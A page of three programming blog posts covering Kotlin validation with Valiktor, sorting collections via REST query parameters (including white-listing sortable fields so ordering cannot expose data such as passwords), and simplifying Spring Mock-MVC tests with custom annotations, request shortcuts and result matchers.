<p>Michael Scharhag, https://www.mscharhag.com, 2020-11-19</p>
<p><a href="https://beanvalidation.org/" rel="nofollow" target="_blank">Bean Validation</a> is the Java standard for validation and can be used in Kotlin as well. However, there are also two popular alternative libraries for validation available in Kotlin: <a href="https://github.com/konform-kt/konform" rel="nofollow" target="_blank">Konform</a> and <a href="https://github.com/valiktor/valiktor" rel="nofollow" target="_blank">Valiktor</a>. Both implement validation in a more Kotlin-like way without annotations. In this post we will look at Valiktor.</p>
<h2>Getting started with Valiktor</h2>
<p>First we need to add the Valiktor dependency to our project.</p>
<p>For Maven:</p>
<pre class="brush: xml">
<dependency>
    <groupId>org.valiktor</groupId>
    <artifactId>valiktor-core</artifactId>
    <version>0.12.0</version>
</dependency></pre>
<p>For Gradle:</p>
<pre class="brush: xml">
implementation 'org.valiktor:valiktor-core:0.12.0'</pre>
<p>Now let's look at a simple example:</p>
<pre class="brush: java">
class Article(val title: String, val text: String) {
    init {
        validate(this) {
            validate(Article::text).hasSize(min = 10, max = 10000)
            validate(Article::title).isNotBlank()
        }
    }
}</pre>
<p>Within the init block we call the <span class="code">validate(..)</span> function to validate the <span class="code">Article</span> object. <span class="code">validate(..)</span> accepts two parameters: The object that should be validated and a validation function. In the validation function we define validation constraints for the <span class="code">Article</span> class.</p>
<p>Now we try to create an invalid <span class="code">Article</span> object with:</p>
<pre class="brush: java">
Article(title = "", text = "some article text")
</pre>
<p>This causes a <span class="code">ConstraintViolationException</span> to be thrown because the <span class="code">title</span> field is not allowed to be empty.</p>
<h2>More validation constraints</h2>
<p>Let's look at a few more example validation rules:</p>
<pre class="brush: java">
validate(this) {
    // Multiple constraints can be chained
    validate(Article::authorEmail)
        .isNotBlank()
        .isEmail()
        .endsWith("@cool-blog.com")

    // Nested validation
    // Checks that Article.category.name is not blank
    validate(Article::category).validate {
        validate(Category::name).isNotBlank()
    }

    // Collection validation
    // Checks that no Keyword in the keywords collection has a blank name
    validate(Article::keywords).validateForEach {
        validate(Keyword::name).isNotBlank()
    }

    // Conditional validation
    // If the article is published the permalink field cannot be blank
    if (isPublished) {
        validate(Article::permalink).isNotBlank()
    }
}</pre>
<h2>Validating objects from outside</h2>
<p>In the previous examples the validation constraints are implemented within the object's <span class="code">init</span> block. However, it is also possible to perform the validation outside the class.</p>
<p>For example:</p>
<pre class="brush: java">
val person = Person(name = "")
validate(person) {
    validate(Person::name).isNotBlank()
}</pre>
<p>This validates the previously created <span class="code">Person</span> object and causes a <span class="code">ConstraintViolationException</span> to be thrown (because <span class="code">name</span> is empty).</p>
<h2>Creating a custom validation constraint</h2>
<p>To define our own validation methods we need two things: An implementation of the <span class="code">Constraint</span> interface and an extension method. The following snippet shows an example validation method to make sure an <span class="code">Iterable<T></span> does not contain duplicate elements:</p>
<pre class="brush: java">
object NoDuplicates : Constraint

fun <E, T> Validator<E>.Property<Iterable<T>?>.hasNoDuplicates()
    = this.validate(NoDuplicates) { iterable: Iterable<T>? ->
        if (iterable == null) {
            return@validate true
        }
        val list = iterable.toList()
        val set = list.toSet()
        set.size == list.size
    }</pre>
<p>This adds a method named <span class="code">hasNoDuplicates()</span> to <span class="code">Validator<E>.Property<Iterable<T>?></span>. So this method can be called for fields of type <span class="code">Iterable<T></span>. The extension method is implemented by calling <span class="code">validate(..)</span> with our <span class="code">Constraint</span> and passing a validation function.</p>
<p>In the validation function we implement the actual validation. In this example we simply convert the <span class="code">Iterable</span> to a <span class="code">List</span> and then the <span class="code">List</span> to a <span class="code">Set</span>. If duplicate elements are present both collections have a different size (a <span class="code">Set</span> does not contain duplicate elements).</p>
<p>We can now use our <span class="code">hasNoDuplicates()</span> validation method like this:</p>
<pre class="brush: java">
class Article(val keywords: List<Keyword>) {
    init {
        validate(this) {
            validate(Article::keywords).hasNoDuplicates()
        }
    }
}</pre>
<h2>Conclusion</h2>
<p>Valiktor is an interesting alternative for validation in Kotlin. It provides a fluent DSL to define validation rules. Those rules are defined in standard Kotlin code (and not via annotations) which makes it easy to add conditional logic. Valiktor comes with many predefined validation constraints. Custom constraints can easily be implemented using extension functions.</p>
<h1>REST: Sorting collections</h1>
<p>Michael Scharhag, https://www.mscharhag.com, 2020-11-06</p>
<p>When building a RESTful API we often want to give consumers the option to order collections in a specific way (e.g. ordering <em>users</em> by <em>last name</em>). If our API supports <a href="https://www.mscharhag.com/api-design/rest-pagination" target="_blank">pagination</a> this can be quite an important feature. When clients only query a specific part of a collection they are unable to order elements on the client.</p>
<p>Sorting is typically implemented via query parameters. In the next sections we look into common ways to sort collections and a few things we should consider.</p>
<h2>Sorting by single fields</h2>
<p>The easiest way is to allow sorting only by a single field. In this case, we just have to add two query parameters for the field and the sort direction to the request URI.</p>
<p>For example, we can sort a list of products by price using:</p>
<pre>
GET /products?sort=price&order=asc</pre>
<p><em>asc</em> and <em>desc</em> are usually used to indicate ascending and descending ordering.</p>
<p>We can reduce this to a single parameter by separating both values with a delimiter. For example:</p>
<pre>
GET /products?sort=price:asc</pre>
<p>As we see in the next section, this makes it easier for us to support sorting by more than one field.</p>
<h2>Sorting by multiple fields</h2>
<p>To support sorting by multiple fields we can simply use the previous one-parameter way and separate fields by another delimiter. For example:</p>
<pre>
GET /products?sort=price:asc,name:desc</pre>
<p>It is also possible to use the same parameter multiple times:</p>
<pre>
GET /products?sort=price:asc&sort=name:desc</pre>
<p>Note that using the same parameter multiple times is not explicitly covered by the HTTP RFCs. However, it is supported by most web frameworks (see this <a href="https://stackoverflow.com/questions/24059773/correct-way-to-pass-multiple-values-for-same-parameter-name-in-get-request" rel="nofollow" target="_blank">discussion on Stack Overflow</a>).</p>
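<p>Parsing the single-parameter format (for example <em>price:asc,name:desc</em>) takes only a few lines of code. The following Java sketch shows one possible approach. The class names are hypothetical, and defaulting to ascending order when no direction is given is an assumption of this example, not something the format requires.</p>

```java
import java.util.ArrayList;
import java.util.List;

final class SortParser {

    enum Direction { ASC, DESC }

    static final class SortField {
        final String field;
        final Direction direction;

        SortField(String field, Direction direction) {
            this.field = field;
            this.direction = direction;
        }
    }

    /** Parses values like "price:asc,name:desc" into an ordered list of sort fields. */
    static List<SortField> parse(String sortParameter) {
        List<SortField> result = new ArrayList<>();
        for (String part : sortParameter.split(",")) {
            String[] fieldAndDirection = part.trim().split(":", 2);
            String field = fieldAndDirection[0].trim();
            if (field.isEmpty()) {
                throw new IllegalArgumentException("Missing sort field in: " + sortParameter);
            }
            // Assumption: ascending order is used if no direction is given
            Direction direction = Direction.ASC;
            if (fieldAndDirection.length == 2) {
                direction = parseDirection(fieldAndDirection[1].trim());
            }
            result.add(new SortField(field, direction));
        }
        return result;
    }

    private static Direction parseDirection(String value) {
        if ("asc".equalsIgnoreCase(value)) {
            return Direction.ASC;
        }
        if ("desc".equalsIgnoreCase(value)) {
            return Direction.DESC;
        }
        throw new IllegalArgumentException("Unknown sort direction: " + value);
    }
}
```

<p>If the same parameter is sent multiple times, each value can be passed to the same method and the results can be concatenated.</p>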
<h2>Checking sort parameters against a white list</h2>
<p>Sort parameters should always be checked against a white list of sortable fields. If we pass sort parameters unchecked to the database, attackers can come up with requests like this:</p>
<pre>
GET /users?sort=password:asc</pre>
<p>Yes, this would possibly not be a real issue if passwords are correctly hashed. However, I think you get the point. Even if the response does not contain the field we use for ordering, the simple order of collection elements could lead to unintended <a href="https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure" rel="nofollow" target="_blank">data exposure</a>.</p>
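<p>A white list can be as simple as a fixed mapping from public field names to database columns. The following Java sketch illustrates the idea. The field names, the column names and the generated <em>ORDER BY</em> fragment are assumptions made for this example. The important part is that only values from the white list ever reach the query.</p>

```java
import java.util.Map;

final class SortWhitelist {

    // Hypothetical mapping from public sort field names to database column names
    private static final Map<String, String> SORTABLE_FIELDS = Map.of(
            "lastName", "last_name",
            "createdAt", "created_at");

    /** Returns the column for an allowed sort field and rejects everything else. */
    static String columnFor(String requestedField) {
        String column = SORTABLE_FIELDS.get(requestedField);
        if (column == null) {
            throw new IllegalArgumentException("Sorting by '" + requestedField + "' is not supported");
        }
        return column;
    }

    /** Builds an ORDER BY fragment that only contains white-listed column names. */
    static String orderByClause(String requestedField, boolean ascending) {
        return "ORDER BY " + columnFor(requestedField) + (ascending ? " ASC" : " DESC");
    }
}
```

<p>A request like <em>/users?sort=password:asc</em> is rejected with an exception, which the API could translate into a <em>400 (Bad Request)</em> response.</p>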
<h1>Improving Spring Mock-MVC tests</h1>
<p>Michael Scharhag, https://www.mscharhag.com, 2020-11-02</p>
<p><a href="https://docs.spring.io/spring-framework/docs/current/reference/html/testing.html#spring-mvc-test-framework" rel="nofollow">Spring Mock-MVC</a> can be a great way to test Spring Boot REST APIs. Mock-MVC allows us to test Spring-MVC request handling without running a real server.</p>
<p>I used Mock-MVC tests in various projects and in my experience they often become quite verbose. This doesn't have to be bad. However, it often results in copy/pasting code snippets around in test classes. In this post we will look at a couple of ways to clean up Spring Mock-MVC tests.</p>
<h2>Decide what to test with Mock-MVC</h2>
<p>The first question we need to ask is what we want to test with Mock-MVC. Some example test scenarios are:</p>
<ul>
<li>Testing only the web layer and mocking all controller dependencies.</li>
<li>Testing the web layer with domain logic and mocked third party dependencies like Databases or message queues.</li>
<li>Testing the complete path from web to database by replacing third party dependencies with embedded alternatives if possible (e.g. <a href="https://www.h2database.com/html/main.html" rel="nofollow" target="_blank">H2</a> or <a href="https://github.com/embeddedkafka/embedded-kafka" rel="nofollow" target="_blank">embedded-Kafka</a>)</li>
</ul>
<p>All these scenarios have their own up- and downsides. However, I think there are two simple rules we should follow:</p>
<ul>
<li>Test as much as possible in standard JUnit tests (without Spring). This improves test performance a lot and often makes tests easier to write.</li>
<li>Pick the scenario(s) you want to test with Spring and be consistent in the dependencies you mock. This makes tests easier to understand and can speed them up as well. When running many different test configurations, Spring often has to re-initialize the application context which slows tests down.</li>
</ul>
<p>When using standard JUnit tests as much as possible the last scenario mentioned above is often a good fit. After we tested all logic with fast unit tests, we can use a few Mock-MVC tests to verify that all pieces work together, from controller to database.</p>
<h2>Cleaning up test configuration using custom annotations</h2>
<p>Spring allows us to <a href="https://www.mscharhag.com/spring/annotation-composition" target="_blank">compose multiple Spring annotations</a> into a single custom annotation.</p>
<p>For example, we can create a custom <span class="code">@MockMvcTest</span> annotation:</p>
<pre class="brush: java">
@SpringBootTest
@TestPropertySource(locations = "classpath:test.properties")
@AutoConfigureMockMvc(secure = false)
@Retention(RetentionPolicy.RUNTIME)
public @interface MockMvcTest {}</pre>
<p>Our test now only needs a single annotation:</p>
<pre class="brush: java">
@MockMvcTest
public class MyTest {
...
}</pre>
<p>This way we can remove repeated annotations from our tests. It also helps to standardize the Spring configuration for our test scenarios.</p>
<h2>Improving Mock-MVC requests</h2>
<p>Let's look at the following example Mock-MVC request and see how we can improve it:</p>
<pre class="brush: java">
mvc.perform(put("/products/42")
        .contentType(MediaType.APPLICATION_JSON)
        .accept(MediaType.APPLICATION_JSON)
        .content("{\"name\": \"Cool Gadget\", \"description\": \"Looks cool\"}")
        .header("Authorization", getBasicAuthHeader("John", "secr3t")))
        .andExpect(status().isOk());</pre>
<p>This sends a PUT request with some JSON data and an <span class="code">Authorization</span> header to <em>/products/42</em>.</p>
<p>The first thing that catches someone's eye is the JSON snippet within a Java string. This is obviously a problem as the double quote escaping required by Java strings makes it barely readable.</p>
<p>Typically we should use an object that is then converted to JSON. Before we look into this approach, it is worth mentioning text blocks. <a href="https://www.mscharhag.com/java/text-blocks" target="_blank">Java text blocks</a> were introduced as a preview feature in JDK 13 and 14 and became a standard feature in JDK 15. Text blocks are strings that can span multiple lines and require no double quote escaping.</p>
<p>With text blocks we can format inline JSON in a prettier way. For example:</p>
<pre class="brush: java">
mvc.perform(put("/products/42")
        .contentType(MediaType.APPLICATION_JSON)
        .accept(MediaType.APPLICATION_JSON)
        .content("""
            {
                "name": "Cool Gadget",
                "description": "Looks cool"
            }
            """)
        .header("Authorization", getBasicAuthHeader("John", "secr3t")))
        .andExpect(status().isOk());</pre>
<p>In certain situations this can be useful.</p>
<p>However, we should still prefer objects that are converted to JSON instead of manually writing and maintaining JSON strings.</p>
<p>For example:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(put("/products/42")
        .contentType(MediaType.APPLICATION_JSON)
        .accept(MediaType.APPLICATION_JSON)
        .content(objectToJson(product))
        .header("Authorization", getBasicAuthHeader("John", "secr3t")))
        .andExpect(status().isOk());
</pre>
<p>Here we create a product object and convert it to JSON with a small <span class="code">objectToJson(..)</span> helper method. This helps a bit. Nevertheless, we can do better.</p>
<p>Our request contains a lot of elements that can be grouped together. When building a JSON REST API it is likely that we often have to send similar PUT requests. Therefore, we create a small static shortcut method:</p>
<pre class="brush: java">
public static MockHttpServletRequestBuilder putJson(String uri, Object body) {
    try {
        String json = new ObjectMapper().writeValueAsString(body);
        return put(uri)
                .contentType(MediaType.APPLICATION_JSON)
                .accept(MediaType.APPLICATION_JSON)
                .content(json);
    } catch (JsonProcessingException e) {
        throw new RuntimeException(e);
    }
}</pre>
<p>This method converts the <span class="code">body</span> parameter to JSON using a Jackson <span class="code">ObjectMapper</span>. It then creates a PUT request and sets <span class="code">Accept</span> and <span class="code">Content-Type</span> headers.</p>
<p>This reusable method simplifies our test request a lot:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(putJson("/products/42", product)
        .header("Authorization", getBasicAuthHeader("John", "secr3t")))
        .andExpect(status().isOk());</pre>
<p>The nice thing here is that we do not lose flexibility. Our <span class="code">putJson(..)</span> method returns a <span class="code">MockHttpServletRequestBuilder</span>. This allows us to add additional request properties within tests if required (like the <span class="code">Authorization</span> header in this example).</p>
<p>Authentication headers are another topic we often have to deal with when writing Spring Mock-MVC tests. However, we should not add authentication headers to our previous <span class="code">putJson(..)</span> method. Even if all PUT requests require authentication we stay more flexible if we deal with authentication in a different way.</p>
<p><span class="code">RequestPostProcessor</span>s can help us with this. As the name suggests, <span class="code">RequestPostProcessor</span>s can be used to process the request. We can use this to add custom headers or other information to the request.</p>
<p>For example:</p>
<pre class="brush: java">
public static RequestPostProcessor authentication() {
    return request -> {
        request.addHeader("Authorization", getBasicAuthHeader("John", "secr3t"));
        return request;
    };
}</pre>
<p>The <span class="code">authentication()</span> method returns a <span class="code">RequestPostProcessor</span> which adds Basic-Authentication to the request. We can apply this <span class="code">RequestPostProcessor</span> in our test using the <span class="code">with(..)</span> method:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(putJson("/products/42", product).with(authentication()))
        .andExpect(status().isOk());</pre>
<p>This not only simplifies our test request. If we change the request header format we now only need to modify a single method to fix the tests. Additionally, <span class="code">putJson(url, data).with(authentication())</span> is quite expressive to read.</p>
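<p>The snippets above call a <span class="code">getBasicAuthHeader(..)</span> helper without showing it. A possible implementation (a sketch based on the standard Basic authentication scheme, not necessarily the one used in the example project) could look like this. The class name <span class="code">BasicAuth</span> is made up for this illustration.</p>

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class BasicAuth {

    /** Builds the value of an Authorization header for HTTP Basic authentication. */
    static String getBasicAuthHeader(String username, String password) {
        // Basic authentication sends "username:password" as a Base64 encoded string
        String credentials = username + ":" + password;
        String encoded = Base64.getEncoder()
                .encodeToString(credentials.getBytes(StandardCharsets.UTF_8));
        return "Basic " + encoded;
    }
}
```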
<h2>Improving response verification</h2>
<p>Now let's see how we can improve response verification.</p>
<p>We start with the following example:</p>
<pre class="brush: java">
mvc.perform(get("/products/42"))
        .andExpect(status().isOk())
        .andExpect(header().string("Cache-Control", "no-cache"))
        .andExpect(jsonPath("$.name").value("Cool Gadget"))
        .andExpect(jsonPath("$.description").value("Looks cool"));</pre>
<p>Here we check the HTTP status code, make sure the <span class="code">Cache-Control</span> header is set to <span class="code">no-cache</span> and use JSON-Path expressions to verify the response payload.</p>
<p>The <span class="code">Cache-Control</span> header looks like something we probably need to check for multiple responses. In this case, it can be a good idea to come up with a small shortcut method:</p>
<pre class="brush: java">
public ResultMatcher noCacheHeader() {
    return header().string("Cache-Control", "no-cache");
}</pre>
<p>We can now apply the check by passing <span class="code">noCacheHeader()</span> to <span class="code">andExpect(..)</span>:</p>
<pre class="brush: java">
mvc.perform(get("/products/42"))
        .andExpect(status().isOk())
        .andExpect(noCacheHeader())
        .andExpect(jsonPath("$.name").value("Cool Gadget"))
        .andExpect(jsonPath("$.description").value("Looks cool"));
</pre>
<p>The same approach can be used to verify the response body.</p>
<p>For example we can create a small <span class="code">product(..)</span> method that compares the response JSON with a given <span class="code">Product</span> object:</p>
<pre class="brush: java">
public static ResultMatcher product(String prefix, Product product) {
    return ResultMatcher.matchAll(
            jsonPath(prefix + ".name").value(product.getName()),
            jsonPath(prefix + ".description").value(product.getDescription())
    );
}</pre>
<p>Our test now looks like this:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(get("/products/42"))
        .andExpect(status().isOk())
        .andExpect(noCacheHeader())
        .andExpect(product("$", product));</pre>
<p>Note that the <span class="code">prefix</span> parameter gives us flexibility. The object we want to check might not always be located at the JSON root level of the response.</p>
<p>Assume a request might return a collection of products. We can then use the <span class="code">prefix</span> parameter to select each product in the collection. For example:</p>
<pre class="brush: java">
Product product0 = ..
Product product1 = ..
mvc.perform(get("/products"))
        .andExpect(status().isOk())
        .andExpect(product("$[0]", product0))
        .andExpect(product("$[1]", product1));
</pre>
<p>With <span class="code">ResultMatcher</span> methods you avoid scattering the exact response data structure over many tests. This again supports refactorings.</p>
<h2>Summary</h2>
<p>We looked into a few ways to reduce verbosity in Spring Mock-MVC tests. Before we even start writing Mock-MVC tests we should decide what we want to test and what parts of the application should be replaced with mocks. Often it is a good idea to test as much as possible with standard unit tests (without Spring and Mock-MVC).</p>
<p>We can use custom test annotations to standardize our Spring Mock-MVC test setup. With small shortcut methods and <span class="code">RequestPostProcessor</span>s we can move reusable request code out of test methods. Custom <span class="code">ResultMatcher</span>s can be used to improve response checks.</p>
<p>You can find the example code on <a href="https://github.com/mscharhag/blog-examples/tree/master/mockmvc-testing" target="_blank">GitHub</a>.</p>